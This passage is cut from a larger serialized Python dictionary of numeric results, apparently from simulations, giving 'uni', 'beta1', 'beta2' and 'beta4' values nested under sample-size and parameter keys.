[0.006373897578729658, 1.118051730471194]}, 400: {'uni': 0.03962556425612263, 'beta1': 0.00302236885935727, 'beta2': 0.28268247076294517, 'beta4': [0.006505476273152509, 1.1195062441426369]}, 300: {'uni': 0.03952239211713717, 'beta1': 0.002251421100688415, 'beta2': 0.2925527201127294, 'beta4': [0.00627083227986432, 1.0947897660301564]}, 200: {'uni': 0.05376346846673587, 'beta1': 0.0056129209261833535, 'beta2': 0.3045540431166837, 'beta4': [0.008073612074167416, 1.0780367857898463]}, 150: {'uni': 0.06707689863621345, 'beta1': 0.011476123926329301, 'beta2': 0.32317902238154983, 'beta4': [0.010910287838315519, 1.0784206140124115]}, 100: {'uni': 0.11377796787499908, 'beta1': 0.017237766709165093, 'beta2': 0.39768431902260115, 'beta4': [0.017631802606458878, 1.0682337278229384]}, 75: {'uni': 0.13894361913665587, 'beta1': 0.034186434799691474, 'beta2': 0.42306830656659034, 'beta4': [0.020660954120022272, 1.055028950778487]}, 50: {'uni': 0.24645011563196215, 'beta1': 0.060091771835968005, 'beta2': 0.4754042570886038, 'beta4': [0.029688920539531042, 1.0479568249986413]}, 30: {'uni': 0.28440873282543555, 'beta1': 0.109482940639056, 'beta2': 0.549994604048401, 'beta4': [0.04505001011774477, 1.037756617970666]}, 20: {'uni': 0.3850513892674541, 'beta1': 0.18201980352057348, 'beta2': 0.60256622468304, 'beta4': [0.06367752118379469, 1.0351258834952837]}, 10: {'uni': 0.5628533038813214, 'beta1': 0.3407017594138133, 'beta2': 0.7477263579938394, 'beta4': [0.09592116572544965, 1.022312456228958]}}, 200: {1000: {'uni': 0.051601596152469564, 'beta1': 0.006491242570563972, 'beta2': 0.3164865095370956, 'beta4': [0.008515436068305947, 1.2250561343578927]}, 750: {'uni': 0.05613472283253878, 'beta1': 0.006185240425682315, 'beta2': 0.3200056117230271, 'beta4': [0.009431110687418993, 1.1808048095372374]}, 500: {'uni': 0.05414951218228231, 'beta1': 0.005424286099782189, 'beta2': 0.2896123389973014, 'beta4': [0.008729410861757693, 1.156445325855722]}, 400: {'uni': 0.059769732308283904, 
'beta1': 0.007709482270162348, 'beta2': 0.3211568642021472, 'beta4': [0.00943841263293194, 1.1436174420814718]}, 300: {'uni': 0.0671236882849256, 'beta1': 0.013165057157040751, 'beta2': 0.3074804572409215, 'beta4': [0.008674766530753029, 1.1551805439752956]}, 200: {'uni': 0.05940380948969049, 'beta1': 0.008940837305905933, 'beta2': 0.3068678000469144, 'beta4': [0.008468628870642946, 1.1144914248339726]}, 150: {'uni': 0.07051256848164812, 'beta1': 0.01231387540113938, 'beta2': 0.3734112375168418, 'beta4': [0.011635530187338912, 1.1102344418624115]}, 100: {'uni': 0.1282684380789726, 'beta1': 0.016640339898161893, 'beta2': 0.39116647758434087, 'beta4': [0.017474878824371418, 1.0990514429552851]}, 75: {'uni': 0.1388309766758086, 'beta1': 0.025448616151534417, 'beta2': 0.45250946908108447, 'beta4': [0.023311701330211987, 1.083242075394765]}, 50: {'uni': 0.17657749869850825, 'beta1': 0.06590868264165664, 'beta2': 0.48642256198348116, 'beta4': [0.028818054716693024, 1.0722919065661418]}, 30: {'uni': 0.32013439830903245, 'beta1': 0.11118974873831032, 'beta2': 0.5613232063927698, 'beta4': [0.04081080838254353, 1.0552597162547668]}, 20: {'uni': 0.38424963752626534, 'beta1': 0.17660282729028604, 'beta2': 0.593322847020505, 'beta4': [0.05494264637722776, 1.0459229007658148]}, 10: {'uni': 0.5184288204086329, 'beta1': 0.38782813410673844, 'beta2': 0.7328305414558911, 'beta4': [0.08660308646383802, 1.0377583841616613]}}, 150: {1000: {'uni': 0.06880107878218425, 'beta1': 0.009598485908326378, 'beta2': 0.3197001858692086, 'beta4': [0.0115533026707448, 1.2515620374494822]}, 750: {'uni': 0.0671538349318563, 'beta1': 0.014647157229541262, 'beta2': 0.375933792122322, 'beta4': [0.014940923590390768, 1.2659371027967505]}, 500: {'uni': 0.07579941138021336, 'beta1': 0.013754198701614238, 'beta2': 0.39570733064249597, 'beta4': [0.014561840496955112, 1.2086766334984447]}, 400: {'uni': 0.0847281819234035, 'beta1': 0.008910478557270205, 'beta2': 0.3666666885993351, 'beta4': 
[0.012852767161018493, 1.2068807776896686]}, 300: {'uni': 0.08275727613852064, 'beta1': 0.009015687407474727, 'beta2': 0.3471630079992819, 'beta4': [0.012103178530792815, 1.1972581680617507]}, 200: {'uni': 0.0699359902862645, 'beta1': 0.009384943893264627, 'beta2': 0.3269694126933192, 'beta4': [0.011187014417355612, 1.1810564835980994]}, 150: {'uni': 0.08068630534099007, 'beta1': 0.013117986655350801, 'beta2': 0.3822122264853986, 'beta4': [0.013664905276287356, 1.1479655026499307]}, 100: {'uni': 0.10274077669371745, 'beta1': 0.02514437513488057, 'beta2': 0.38582280171054567, 'beta4': [0.015032971481420694, 1.1365471408564738]}, 75: {'uni': 0.1348170016638727, 'beta1': 0.03443745035471468, 'beta2': 0.4157108199307209, 'beta4': [0.01875505481793789, 1.1127844118652421]}, 50: {'uni': 0.19293945781097221, 'beta1': 0.054828889323951385, 'beta2': 0.433458306476045, 'beta4': [0.03510746977521885, 1.0896411928401573]}, 30: {'uni': 0.2898196959850388, 'beta1': 0.11828649409279716, 'beta2': 0.519891016190952, 'beta4': [0.04140751936809961, 1.0735803416018648]}, 20: {'uni': 0.3761111120943085, 'beta1': 0.1860423597466752, 'beta2': 0.6015283358377184, 'beta4': [0.05855148221335893, 1.069790984842932]}, 10: {'uni': 0.5740144616695647, 'beta1': 0.3906152950549322, 'beta2': 0.743599714948697, 'beta4': [0.08689760856128591, 1.050307480515673]}}, 100: {1000: {'uni': 0.10099521848726027, 'beta1': 0.026645236836375326, 'beta2': 0.4561009377668412, 'beta4': [0.021664452129982456, 1.392173473496957]}, 750: {'uni': 0.1129539961558924, 'beta1': 0.0213008367839638, 'beta2': 0.5636820614328856, 'beta4': [0.025867002400168083, 1.3748477673872852]}, 500: {'uni': 0.13246151241247883, 'beta1': 0.017762693718526533, 'beta2': 0.4066575501194243, 'beta4': [0.02093940465927965, 1.379384860789293]}, 400: {'uni': 0.11017063968512505, 'beta1': 0.023890314699091485, 'beta2': 0.3877834593983558, 'beta4': [0.019903776791393917, 1.3299478081944538]}, 300: {'uni': 0.16846581725687973, 'beta1': 
0.021247654758048126, 'beta2': 0.3876626946907388, 'beta4': [0.017170755289126795, 1.3070608648942346]}, 200: {'uni': 0.11450225522323053, 'beta1': 0.03447492619969185, 'beta2': 0.43616025388644963, 'beta4': [0.019008447347663, 1.2556973492967485]}, 150: {'uni': 0.13539117909597762, 'beta1': 0.020847767798978102, 'beta2': 0.5426589645895388, 'beta4': [0.02008844669853126, 1.212436060212826]}, 100: {'uni': 0.12395958532813696, 'beta1': 0.026023867138296748, 'beta2': 0.41567054621152966, 'beta4': [0.016312695398788834, 1.1934267130464744]}, 75: {'uni': 0.14958491655531964, 'beta1': 0.031328587828317545, 'beta2': 0.43539171455677583, 'beta4': [0.024389470944773287, 1.18591210476864]}, 50: {'uni': 0.20866608846080864, 'beta1': 0.0738343960442376, 'beta2': 0.46150269335210786, 'beta4': [0.03578478824558125, 1.1375845053243308]}, 30: {'uni': 0.2765100135009761, 'beta1': 0.10827097512399869, 'beta2': 0.5373945228642734, 'beta4': [0.04369745106389154, 1.127526956638849]}, 20: {'uni': 0.3823407507282141, 'beta1': 0.1999235052735679, 'beta2': 0.6038440766159979, 'beta4': [0.05885220974852782, 1.1023317863265667]}, 10: {'uni': 0.5298206414110227, 'beta1': 0.35708844112316296, 'beta2': 0.7239655162112311, 'beta4': [0.09086303269946881, 1.0771590457606335]}}, 75: {1000: {'uni': 0.16101820508997058, 'beta1': 0.0392663030910949, 'beta2': 0.5955010581399385, 'beta4': [0.028166682841671876, 1.4850878870706135]}, 750: {'uni': 0.13400430917278547, 'beta1': 0.05186636043863356, 'beta2': 0.47891299647806207, 'beta4': [0.023805416421474473, 1.5109324828309596]}, 500: {'uni': 0.15033015022241447, 'beta1': 0.03498316710360079, 'beta2': 0.5770284290238726, 'beta4': [0.023372147158943823, 1.4093787391715362]}, 400: {'uni': 0.1531914829080008, 'beta1': 0.03781775380753009, 'beta2': 0.48308220257966694, 'beta4': [0.026036202653387366, 1.3894387213434034]}, 300: {'uni': 0.140096050494891, 'beta1': 0.047058302826873004, 'beta2': 0.48763956543855647, 'beta4': [0.025154254231467974, 
1.3428703157935498]}, 200: {'uni': 0.1695800443031254, 'beta1': 0.03248996820371958, 'beta2': 0.4993172041736475, 'beta4': [0.02447051797136617, 1.3717654226221188]}, 150: {'uni': 0.1746878943796265, 'beta1': 0.03620855583816983, 'beta2': 0.43462449526898567, 'beta4': [0.027158912702479637, 1.287118609178937]}, 100: {'uni': 0.17674936395333152, 'beta1': 0.04584363097014311, 'beta2': 0.5011652752537196, 'beta4': [0.023203397617561898, 1.281352064318893]}, 75: {'uni': 0.16666336190194875, 'beta1': 0.043759999233142555, 'beta2': 0.5854013951049823, 'beta4': [0.025734039291296158, 1.2513099214564491]}, 50: {'uni': 0.19778123745684092, 'beta1': 0.05857582115085566, 'beta2': 0.6491458878476999, 'beta4': [0.027734464855309886, 1.2186804525897197]}, 30: {'uni': 0.2908349398537664, 'beta1': 0.12303564804929479, 'beta2': 0.6579127634146081, 'beta4': [0.03925267307683, 1.1786830486510413]}, 20: {'uni': 0.3870059702226258, 'beta1': 0.1638510250315426, 'beta2': 0.6204378214586946, 'beta4': [0.06209409909141029, 1.1517104578692603]}, 10: {'uni': 0.5355522101172704, 'beta1': 0.35408050675108815, 'beta2': 0.7285108013888837, 'beta4': [0.08430842704984991, 1.097394751106502]}}, 50: {1000: {'uni': 0.22424609164297443, 'beta1': 0.10025843798909305, 'beta2': 0.6109226727203947, 'beta4': [0.03924165854902822, 1.6267421226716416]}, 750: {'uni': 0.2537903023335899, 'beta1': 0.07416880769129822, 'beta2': 0.5080375269871897, 'beta4': [0.03314676909701872, 1.5589018573309383]}, 500: {'uni': 0.23308360263225839, 'beta1': 0.09163661437479734, 'beta2': 0.5477035534119664, 'beta4': [0.034651811631448516, 1.4984262997193514]}, 400: {'uni': 0.2135555660715244, 'beta1': 0.10738424676399555, 'beta2': 0.7301181390917937, 'beta4': [0.044360696665479454, 1.5793090007440191]}, 300: {'uni': 0.20845412309578348, 'beta1': 0.07774222049722822, 'beta2': 0.5953760006140618, 'beta4': [0.03279491280419391, 1.627027852109703]}, 200: {'uni': 0.24319321692664747, 'beta1': 0.13124268707554892, 'beta2': 
0.6370589117638976, 'beta4': [0.03790435948557217, 1.4455538593119952]}, 150: {'uni': 0.2376511481632187, 'beta1': 0.07273309414631492, 'beta2': 0.544820369601891, 'beta4': [0.05862998404005149, 1.4572932486873187]}, 100: {'uni': 0.29513109730105114, 'beta1': 0.08860359124141814, 'beta2': 0.5285161783868962, 'beta4': [0.038192643880053403, 1.3806124902781127]}, 75: {'uni': 0.2749288556572405, 'beta1': 0.13174377627922593, 'beta2': 0.7017994016865113, 'beta4': [0.03527787509171762, 1.372290745982181]}, 50: {'uni': 0.2543344897457348, 'beta1': 0.09211055678263366, 'beta2': 0.7093382651151694, 'beta4': [0.036485429499135996, 1.2745825598839697]}, 30: {'uni': 0.2927948306959651, 'beta1': 0.13810074460874613, 'beta2': 0.6809517549251869, 'beta4': [0.03995430405381426, 1.2517503144067612]}, 20: {'uni': 0.37086983572719695, 'beta1': 0.19185529125873838, 'beta2': 0.6183400380730043, 'beta4': [0.056908678575848075, 1.201276519869532]}, 10: {'uni': 0.5357005611311981, 'beta1': 0.3557142999459758, 'beta2': 0.7117358313845611, 'beta4': [0.08832001083612763, 1.1772531157292991]}}, 30: {1000: {'uni': 0.5375517058914333, 'beta1': 0.18682553850708347, 'beta2': 0.9623725671332998, 'beta4': [0.05111006116199637, 2.1284403063269264]}, 750: {'uni': 0.3577356511491193, 'beta1': 0.2793514883989638, 'beta2': 1.0975406538160377, 'beta4': [0.07097824896206201, 1.9871758843512004]}, 500: {'uni': 0.702141698978866, 'beta1': 0.26555631462924306, 'beta2': 0.9740832893485976, 'beta4': [0.05511187550828117, 1.9841038060295242]}, 400: {'uni': 0.5145446263289309, 'beta1': 0.25794540644995834, 'beta2': 0.828981279891515, 'beta4': [0.06082742626722804, 1.9147202001621995]}, 300: {'uni': 0.4711936487014286, 'beta1': 0.1868542186385208, 'beta2': 0.833463071793256, 'beta4': [0.06651105115357443, 1.97384106365458]}, 200: {'uni': 0.4663956914615083, 'beta1': 0.35256215108473493, 'beta2': 0.8182432862218997, 'beta4': [0.06304111167477797, 1.844645269837164]}, 150: {'uni': 0.433320385683165, 'beta1': 
0.2102749321540168, 'beta2': 0.8212444381853243, 'beta4': [0.06040506583522945, 1.7983824565568507]}, 100: {'uni': 0.3812474998448387, 'beta1': 0.22786614409158085, 'beta2': 0.9538255457719403, 'beta4': [0.06026497731561029, 1.7234749363367283]}, 75: {'uni': 0.40094360554599134, 'beta1': 0.23875103233048597, 'beta2': 0.7715118646556511, 'beta4': [0.062243334302248675, 1.6706938143747165]}, 50: {'uni': 0.5023984324782755, 'beta1': 0.21032346823013254, 'beta2': 0.8476224401417406, 'beta4': [0.05376929125174212, 1.5076303475283628]}, 30: {'uni': 0.5022316018535551, 'beta1': 0.19211174291043182, 'beta2': 0.9852383031978549, 'beta4': [0.055882813612441865, 1.5053037754614005]}, 20: {'uni': 0.42257652007685287, 'beta1': 0.2648788987026799, 'beta2': 1.0097366578988298, 'beta4': [0.05212870119742689, 1.3587734455424478]}, 10: {'uni': 0.5752945517368767, 'beta1': 0.3824332965187248, 'beta2': 1.1642452986239304, 'beta4': [0.09422116258863913, 1.2546417636878537]}}, 20: {1000: {'uni': 0.8245658279493084, 'beta1': 0.6714293037543387, 'beta2': 1.1403508046288549, 'beta4': [0.08965514010313543, 2.355993522309204]}, 750: {'uni': 0.7522973791112813, 'beta1': 0.5001791028253899, 'beta2': 1.9167065498955769, 'beta4': [0.08700394872889188, 2.606628099310203]}, 500: {'uni': 0.6830218938900532, 'beta1': 0.5669378077763796, 'beta2': 1.3620749239695735, 'beta4': [0.09055668995699578, 2.324014882888129]}, 400: {'uni': 0.6717027010335322, 'beta1': 0.5881516513277326, 'beta2': 1.2381092252485557, 'beta4': [0.08982533008390195, 2.871104248026336]}, 300: {'uni': 0.7200071531914536, 'beta1': 0.5639971175195339, 'beta2': 1.2954861108358184, 'beta4': [0.10664037978442996, 2.513620523930525]}, 200: {'uni': 0.5904276032048987, 'beta1': 0.4988005660867027, 'beta2': 1.0996965576942577, 'beta4': [0.07945828546825576, 2.403024638109359]}, 150: {'uni': 0.6221222720189126, 'beta1': 0.594144837149773, 'beta2': 1.1617999336669014, 'beta4': [0.1009825524269249, 2.206361430979434]}, 100: {'uni': 
0.6143584688855093, 'beta1': 0.5096177815955042, 'beta2': 1.2546626538685803, 'beta4': [0.08413959400017983, 2.0981666855413628]}, 75: {'uni': 0.8785772478481102, 'beta1': 0.437936732164422, 'beta2': 1.2111561571681346, 'beta4': [0.09396307393791267, 2.359982618370008]}, 50: {'uni': 0.7025752082031005, 'beta1': 0.7186578378289812, 'beta2': 1.2601942541642712, 'beta4': [0.10511632552075476, 1.9884553426902782]}, 30: {'uni': 0.5810201916470588, 'beta1': 0.5995612994384831, 'beta2': 1.4948812858640488, 'beta4': [0.10689852453889333, 1.718598639290735]}, 20: {'uni': 0.6559192165274909, 'beta1': 0.6258327950669433, 'beta2': 1.3153066332074126, 'beta4': [0.08394879019729243, 1.73085600993384]}, 10: {'uni': 0.7114215669900594, 'beta1': 0.5110631063073926, 'beta2': 1.1962015407227755, 'beta4': [0.09298919262453555, 1.540883640483407]}}, 10: {1000: {'uni': 1.9583677469218963, 'beta1': 2.576333617343919, 'beta2': 2.461211967994449, 'beta4': [0.19243838699722618, 3.779369929492513]}, 750: {'uni': 1.938215880657949, 'beta1': 5.391824254480648, 'beta2': 2.6331851083484, 'beta4': [0.21832884837162334, 5.159307970428041]}, 500: {'uni': 2.085024738289965, 'beta1': 3.5133109540444565, 'beta2': 2.382220369676619, 'beta4': [0.16933641621151063, 4.311941729154879]}, 400: {'uni': 2.3249797168528294, 'beta1': 2.0137087338200947, 'beta2': 6.012764801850701, 'beta4': [0.17567403680412053, 3.5548840861243423]}, 300: {'uni': 3.3198326153076034, 'beta1': 2.4070810291499973, 'beta2': 3.717530102940286, 'beta4': [0.19086555116543857, 3.349825429053164]}, 200: {'uni': 2.0254293672943193, 'beta1': 2.299309830454076, 'beta2': 2.7160076476196853, 'beta4': [0.20201006223755733, 5.303158103378205]}, 150: {'uni': 3.282500960658318, 'beta1': 2.1207065638469773, 'beta2': 1.9410779695397329, 'beta4': [0.14779914391992724, 4.172672748245124]}, 100: {'uni': 1.7067606545068066, 'beta1': 2.6790345925314645, 'beta2': 2.642466168596247, 'beta4': [0.17375693292954014, 3.7555270616484635]}, 75: {'uni': 
2.1111537004767342, 'beta1': 2.1926293662494176, 'beta2': 2.644392554644403, 'beta4': [0.16479647222509328, 4.265566144423463]}, 50: {'uni': 2.4816574374593925, 'beta1': 3.225545355279228, 'beta2': 2.427281968416075, 'beta4': [0.21343736012593248, 3.8444544657885107]}, 30: {'uni': 3.1974645398096033, 'beta1': 2.009092390657058, 'beta2': 3.3306193769470287, 'beta4': [0.18325118281932046, 3.195752438854362]}, 20: {'uni': 2.311115457162956, 'beta1': 2.438462691037925, 'beta2': 2.317809029574652, 'beta4': [0.1619449311199175, 2.72060854124639]}, 10: {'uni': 1.860495572909103, 'beta1': 2.4763788602224275, 'beta2': 2.7556546342359924, 'beta4': [0.16743973925875363, 3.272261832564597]}}}, 0.3: {1000: {1000: {'uni': 0.012795174678120393, 'beta1': 0.0002679565864041922, 'beta2': 0.18742635617723044, 'beta4': [0.0017826444891534108, 1.0522042104131124]}, 750: {'uni': 0.018336935363620903, 'beta1': 0.0004754746110374862, 'beta2': 0.18408175297923784, 'beta4': [0.002563961983437563, 1.043912703454493]}, 500: {'uni': 0.023414907512510984, 'beta1': 0.0008285030084488381, 'beta2': 0.21392690782659204, 'beta4': [0.0033738177625835283, 1.0394032441990042]}, 400: {'uni': 0.03177120193768, 'beta1': 0.0019733869982122105, 'beta2': 0.2467648002510673, 'beta4': [0.004811261032941804, 1.033240580519976]}, 300: {'uni': 0.03815290820877515, 'beta1': 0.002748482329194836, 'beta2': 0.2727747044827896, 'beta4': [0.007856020418320583, 1.0290961116997555]}, 200: {'uni': 0.08507691017511126, 'beta1': 0.004948573058538693, 'beta2': 0.3011091377193825, 'beta4': [0.009638805999161303, 1.0242636316798672]}, 150: {'uni': 0.07472797369113161, 'beta1': 0.01904392003417618, 'beta2': 0.337378405759772, 'beta4': [0.010533899245420439, 1.0217123696885337]}, 100: {'uni': 0.11077744339928126, 'beta1': 0.01920778151803272, 'beta2': 0.40483316774024947, 'beta4': [0.01789711695444819, 1.018186238923615]}, 75: {'uni': 0.11990949678305865, 'beta1': 0.029631460430197737, 'beta2': 0.4499087467731683, 'beta4': 
[0.028082405545207613, 1.0150370158274151]}, 50: {'uni': 0.19372523646892206, 'beta1': 0.06105398151552832, 'beta2': 0.49624656830731617, 'beta4': [0.03241573448860706, 1.0149051848586808]}, 30: {'uni': 0.28264799923765627, 'beta1': 0.10436396811276909, 'beta2': 0.5513000690922769, 'beta4': [0.043785922945529736, 1.0104075965139894]}, 20: {'uni': 0.35244841088708184, 'beta1': 0.15811742222657982, 'beta2': 0.6484490905373989, 'beta4': [0.053071394096319016, 1.0091627612927796]}, 10: {'uni': 0.5663818741625132, 'beta1': 0.32324795092972336, 'beta2': 0.7377822567041101, 'beta4': [0.08935636518216408, 1.007346648489344]}}, 750: {1000: {'uni': 0.014485201643862624, 'beta1': 0.0006629138723885677, 'beta2': 0.19299740873601873, 'beta4': [0.0029912098349708974, 1.0635084767551528]}, 750: {'uni': 0.016020228660910164, 'beta1': 0.00044792258619544436, 'beta2': 0.20362324734215456, 'beta4': [0.0028190004783775315, 1.0553314938332476]}, 500: {'uni': 0.019975736604073733, 'beta1': 0.0009383156184602303, 'beta2': 0.21272444569670917, 'beta4': [0.00389143518085255, 1.0465923539174913]}, 400: {'uni': 0.031365488090823956, 'beta1': 0.0020041954646797533, 'beta2': 0.22929318942136415, 'beta4': [0.004484087249726235, 1.0438364985477657]}, 300: {'uni': 0.04640849666921278, 'beta1': 0.0024450870414352735, 'beta2': 0.27450264141297454, 'beta4': [0.006205938298724309, 1.0385476373907243]}, 200: {'uni': 0.06093139793221171, 'beta1': 0.005970997391722452, 'beta2': 0.30214900952475965, 'beta4': [0.009566235751639111, 1.031822806243974]}, 150: {'uni': 0.07407127426735613, 'beta1': 0.011762584862298439, 'beta2': 0.34520256227724017, 'beta4': [0.013083866983431237, 1.0276022904521596]}, 100: {'uni': 0.1049528175541805, 'beta1': 0.02650540954490502, 'beta2': 0.3999251150350931, 'beta4': [0.01622328062265029, 1.029934149910967]}, 75: {'uni': 0.13773478941322262, 'beta1': 0.030231711864218847, 'beta2': 0.4443294917949243, 'beta4': [0.020382021855895858, 1.0225043552068545]}, 50: {'uni': 
0.18860277419001642, 'beta1': 0.048683316697604964, 'beta2': 0.5017857392818516, 'beta4': [0.030640384132032683, 1.0175511796414718]}, 30: {'uni': 0.274229496564352, 'beta1': 0.10553107700842067, 'beta2': 0.6047299624940808, 'beta4': [0.04159495872030207, 1.013590583317765]}, 20: {'uni': 0.3311173740302474, 'beta1': 0.18025665597220492, 'beta2': 0.6559673224772654, 'beta4': [0.05677363500512058, 1.0111469897526215]}, 10: {'uni': 0.5503083494942063, 'beta1': 0.3378803618674342, 'beta2': 0.7382975365394384, 'beta4': [0.08012641482289543, 1.007993647568211]}}, 500: {1000: {'uni': 0.020087175565086567, 'beta1': 0.0013935125324983928, 'beta2': 0.21141747412315226, 'beta4': [0.0032526585097433225, 1.0923841201536304]}, 750: {'uni': 0.023119803219004583, 'beta1': 0.0014919615457760513, 'beta2': 0.2215561352923942, 'beta4': [0.0036458796217003326, 1.083706733679476]}, 500: {'uni': 0.02634673909588432, 'beta1': 0.0012884012398439958, 'beta2': 0.22853225772196686, 'beta4': [0.0038840363233813725, 1.070851191946351]}, 400: {'uni': 0.027863611247881087, 'beta1': 0.0019548832749742423, 'beta2': 0.2660337820317211, 'beta4': [0.006843790543473078, 1.0660486796885624]}, 300: {'uni': 0.04195199023609443, 'beta1': 0.005604419821151305, 'beta2': 0.2673400467917025, 'beta4': [0.005845307042980669, 1.0610970046028447]}, 200: {'uni': 0.060425411269776755, 'beta1': 0.004629539818339217, 'beta2': 0.33400473721899254, 'beta4': [0.009584650972333094, 1.045076938855807]}, 150: {'uni': 0.07429990877171826, 'beta1': 0.009017861104543, 'beta2': 0.31564503571293595, 'beta4': [0.012220242128090822, 1.047639871284981]}, 100: {'uni': 0.10052225463410921, 'beta1': 0.01956089088384902, 'beta2': 0.36499669372521054, 'beta4': [0.015972577920426997, 1.0341821005789347]}, 75: {'uni': 0.13303851391596935, 'beta1': 0.03598466037575139, 'beta2': 0.4319783884267612, 'beta4': [0.023312914741063458, 1.0320364684089665]}, 50: {'uni': 0.16924151473552013, 'beta1': 0.05098263622341181, 'beta2': 
0.47987054682960817, 'beta4': [0.030628113292411226, 1.0253445151693896]}, 30: {'uni': 0.2730853650116837, 'beta1': 0.11958830964796402, 'beta2': 0.5763957024769127, 'beta4': [0.044802580459368586, 1.021053806102985]}, 20: {'uni': 0.34877051560558964, 'beta1': 0.1774726992994486, 'beta2': 0.596517800478609, 'beta4': [0.05608609680158825, 1.0178953367755723]}, 10: {'uni': 0.5382064508681208, 'beta1': 0.34840656929213076, 'beta2': 0.7391836182227792, 'beta4': [0.08303014814835374, 1.0146320825991233]}}, 400: {1000: {'uni': 0.026209806342155622, 'beta1': 0.0012528034498248254, 'beta2': 0.23529367745856108, 'beta4': [0.004320805230985572, 1.112419848894135]}, 750: {'uni': 0.026109204738674938, 'beta1': 0.0015676344082384457, 'beta2': 0.22068244545328733, 'beta4': [0.004474057841167138, 1.094215835056832]}, 500: {'uni': 0.029454600480680656, 'beta1': 0.001397911455226279, 'beta2': 0.24122137931570758, 'beta4': [0.003996336121194239, 1.0858975355177618]}, 400: {'uni': 0.0299979365013004, 'beta1': 0.0016324361130554963, 'beta2': 0.25514254631092853, 'beta4': [0.005012661134952242, 1.075586195091313]}, 300: {'uni': 0.04106239413269716, 'beta1': 0.00265492909809163, 'beta2': 0.2676813799664323, 'beta4': [0.00574872945436531, 1.0777848197004376]}, 200: {'uni': 0.07010191864996612, 'beta1': 0.007739385258328493, 'beta2': 0.28844627964158687, 'beta4': [0.009606054283202024, 1.0623623041267098]}, 150: {'uni': 0.07548793732876151, 'beta1': 0.007173838150662292, 'beta2': 0.31944202255614057, 'beta4': [0.010475083204453681, 1.0535667495755432]}, 100: {'uni': 0.13012977421092564, 'beta1': 0.01950906919380695, 'beta2': 0.38456733938185056, 'beta4': [0.014565591838886616, 1.0444994537785801]}, 75: {'uni': 0.12879610969461608, 'beta1': 0.03316885761904827, 'beta2': 0.4344096694228591, 'beta4': [0.02186931697757683, 1.0417307188802103]}, 50: {'uni': 0.19587048133869084, 'beta1': 0.06726717689172765, 'beta2': 0.4837317952295418, 'beta4': [0.03044567966820428, 1.0316798043768414]}, 30: 
{'uni': 0.2885105758490185, 'beta1': 0.09253031031163511, 'beta2': 0.5426595128852456, 'beta4': [0.044357799095975335, 1.0277129264951208]}, 20: {'uni': 0.3423360016646393, 'beta1': 0.15320983210606476, 'beta2': 0.6150709939528051, 'beta4': [0.06269025330982703, 1.0238961558784514]}, 10: {'uni': 0.5638941332248057, 'beta1': 0.34883930616627784, 'beta2': 0.732850978191352, 'beta4': [0.08097781812359789, 1.0183696008339012]}}, 300: {1000: {'uni': 0.03697391950538826, 'beta1': 0.0037587290091272542, 'beta2': 0.2941880452433283, 'beta4': [0.0062970688023370105, 1.140943658481785]}, 750: {'uni': 0.04459852541100737, 'beta1': 0.002386072912073571, 'beta2': 0.2659829977334984, 'beta4': [0.007119765549883499, 1.1206843223162462]}, 500: {'uni': 0.0357683843109935, 'beta1': 0.0027726863173718644, 'beta2': 0.23609524241025398, 'beta4': [0.005949250566485548, 1.1125558721619353]}, 400: {'uni': 0.03435278048786573, 'beta1': 0.002906613367063174, 'beta2': 0.30866043135716725, 'beta4': [0.006143500069286727, 1.1107577665751034]}, 300: {'uni': 0.045849196840483344, 'beta1': 0.004380918345796293, 'beta2': 0.2771671252127634, 'beta4': [0.006634063460291386, 1.087017134330869]}, 200: {'uni': 0.053859418965440456, 'beta1': 0.0062719069457408405, 'beta2': 0.2963923468974883, 'beta4': [0.008099159991741616, 1.0792869480721894]}, 150: {'uni': 0.07066337263399719, 'beta1': 0.008736997723679881, 'beta2': 0.3251019472842105, 'beta4': [0.013913289456289137, 1.0683038989936084]}, 100: {'uni': 0.09981841785248288, 'beta1': 0.025440638493153908, 'beta2': 0.3966524688792758, 'beta4': [0.01605404277263024, 1.0652860963007686]}, 75: {'uni': 0.15105316789466477, 'beta1': 0.03915037732452085, 'beta2': 0.41626942092060754, 'beta4': [0.02191579411280009, 1.0523909796365454]}, 50: {'uni': 0.17484256812179605, 'beta1': 0.04497383262749608, 'beta2': 0.45572339594264294, 'beta4': [0.02820511965000463, 1.0452251008842077]}, 30: {'uni': 0.2606590603145417, 'beta1': 0.11969227776465383, 'beta2': 
0.5252303693074646, 'beta4': [0.038352104328644714, 1.0348049324704034]}, 20: {'uni': 0.3856413645220924, 'beta1': 0.15140885200484566, 'beta2': 0.6319959664924306, 'beta4': [0.05857015440594212, 1.027654094293965]}, 10: {'uni': 0.5118825279100839, 'beta1': 0.3335710648200135, 'beta2': 0.741387039678667, 'beta4': [0.0859932696959542, 1.024719711098674]}}, 200: {1000: {'uni': 0.05151262491969304, 'beta1': 0.00557100210213531, 'beta2': 0.2668825327634389, 'beta4': [0.010538893374802173, 1.2171655533105397]}, 750: {'uni': 0.05469553492358907, 'beta1': 0.004833789083975562, 'beta2': 0.26489777149823035, 'beta4': [0.010722773184482691, 1.1960517300553821]}, 500: {'uni': 0.04775042790856262, 'beta1': 0.006652995919308116, 'beta2': 0.36021257322332423, 'beta4': [0.008695745069049706, 1.164928412055601]}, 400: {'uni': 0.057334009996901324, 'beta1': 0.004294613400485525, 'beta2': 0.371033028200585, 'beta4': [0.010031180328761704, 1.1501078191012866]}, 300: {'uni': 0.049684597811366665, 'beta1': 0.008499359150427318, 'beta2': 0.29613841935914803, 'beta4': [0.008837488922880181, 1.1231549228365025]}, 200: {'uni': 0.05832825272371185, 'beta1': 0.006697516279795657, 'beta2': 0.39511479851856224, 'beta4': [0.010047397962625848, 1.1181052008643884]}, 150: {'uni': 0.07777153033124701, 'beta1': 0.00900622480430151, 'beta2': 0.3840383315171673, 'beta4': [0.010868672609946542, 1.1055624437674316]}, 100: {'uni': 0.10446273882750046, 'beta1': 0.023086612022459412, 'beta2': 0.3554307967400825, 'beta4': [0.015850124282086046, 1.095887178493004]}, 75: {'uni': 0.1288379259227677, 'beta1': 0.03193365062395732, 'beta2': 0.41758773246133707, 'beta4': [0.019077099325128966, 1.0819065772828271]}, 50: {'uni': 0.20019589133880328, 'beta1': 0.05460579112418594, 'beta2': 0.4492824362223685, 'beta4': [0.03136538729573724, 1.0634108603370227]}, 30: {'uni': 0.2989964472722316, 'beta1': 0.10790396387551246, 'beta2': 0.518601566315402, 'beta4': [0.04157241281091631, 1.0527079106127977]}, 20: {'uni': 
